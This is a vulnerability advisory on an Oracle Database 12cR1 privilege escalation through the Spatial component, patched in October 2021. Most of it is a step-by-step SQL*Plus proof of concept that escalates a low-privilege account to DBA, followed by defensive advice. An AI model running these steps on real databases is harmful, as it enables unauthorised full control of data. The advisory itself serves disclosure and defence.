Title: Oracle Database Privilege Escalation Through Oracle Spatial Component Product: Database Manufacturer: Oracle Affected Version(s): 12.1.0.2 Tested Version(s): 12cR1 Risk Level: High Solution Status: Fixed in Oracle Critical Patch Update October 2021 CVE Reference: N/A, Backported in Oracle CPU OCT 2021 Author of Advisory: Emad Al-Mousa Overview: Privilege Escalation is a famous security vulnerability (explitation technique)..... attackers seek to compromoise IT systems for multiple objectives such as data exfiltration, cause outage,....etc. ***************************************** Vulnerability Details: The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to "DBA" role. DBA role in Oracle is a very powerfull role where the user can view & edit any data within the database, create database objects (tables,malcious code,....etc) and many other harmful activities. The vulnerability exists IF the database system has Oracle "Spatial" component is installed. This vulnerability existed in Oracle 12cR1 and backport fix was issued in October 2021. To check if Oracle Spatial Component is installed, run the following SQL query as it will list ALL installed components within the database system: SQL> select comp_name from dba_registry; ***************************************** Proof of Concept (PoC): // I will create an account called ironman using SYS account, the account will be granted “create session” to connect to the database and “create any procedure”, and “execute any procedure” permissions: sqlplus / as sysdba SQL> create user ironman identified by iron_123; SQL> grant create session to ironman; SQL> grant create any procedure to ironman; SQL> grant execute any procedure to ironman; SQL> exit; // I will now connect using the newly created account “ironman” using sql plus sqlplus ironman/iron_123 SQL> show user USER is “IRONMAN” SQL> select * from session_roles; no rows selected SQL> create or replace procedure SPATIAL_CSW_ADMIN_USR.hulk (SQL_TEXT IN VARCHAR2) as BEGIN EXECUTE IMMEDIATE (SQL_TEXT); END hulk; / SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman'); SQL> select * from session_roles; no rows selected SQL> set role DATAPUMP_IMP_FULL_DATABASE; // ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE SQL> select * from session_roles; ROLE ——————————————————————————– DATAPUMP_IMP_FULL_DATABASE EXP_FULL_DATABASE SELECT_CATALOG_ROLE HS_ADMIN_SELECT_ROLE HS_ADMIN_ROLE HS_ADMIN_EXECUTE_ROLE EXECUTE_CATALOG_ROLE IMP_FULL_DATABASE 8 rows selected. // the next escalation level is to DBA role !! SQL> grant dba to ironman; SQL> set role dba; SQL> select * from session_roles; ROLE ——————————————————————————– DBA SELECT_CATALOG_ROLE HS_ADMIN_SELECT_ROLE HS_ADMIN_ROLE HS_ADMIN_EXECUTE_ROLE EXECUTE_CATALOG_ROLE DELETE_CATALOG_ROLE EXP_FULL_DATABASE Advertisements Report this ad IMP_FULL_DATABASE DATAPUMP_EXP_FULL_DATABASE DATAPUMP_IMP_FULL_DATABASE ROLE ——————————————————————————– GATHER_SYSTEM_STATISTICS SCHEDULER_ADMIN XDBADMIN XDB_SET_INVOKER JAVA_ADMIN JAVA_DEPLOY WM_ADMIN_ROLE CAPTURE_ADMIN OPTIMIZER_PROCESSING_RATE EM_EXPRESS_ALL EM_EXPRESS_BASIC 22 rows selected. --- Conclusion: The account ironman has been successfully elevated to the “DBA” role which is the highest database role in Oracle database system. ***************************************** - Defensive Techniques: configure auditing to catch any privilege escalation attempts. review database account permissions on regular basis. ensure database accounts have strong passwords, and rotate passwords regularly if possible. perform VA (vulnerability assesment) scans on regular basis. pro-actively patch your systems and database systems. ***************************************** References: https://www.oracle.com/security-alerts/cpuoct2021.html https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/ Credit: Security-In-Depth Contributors: Emad Al-Mousa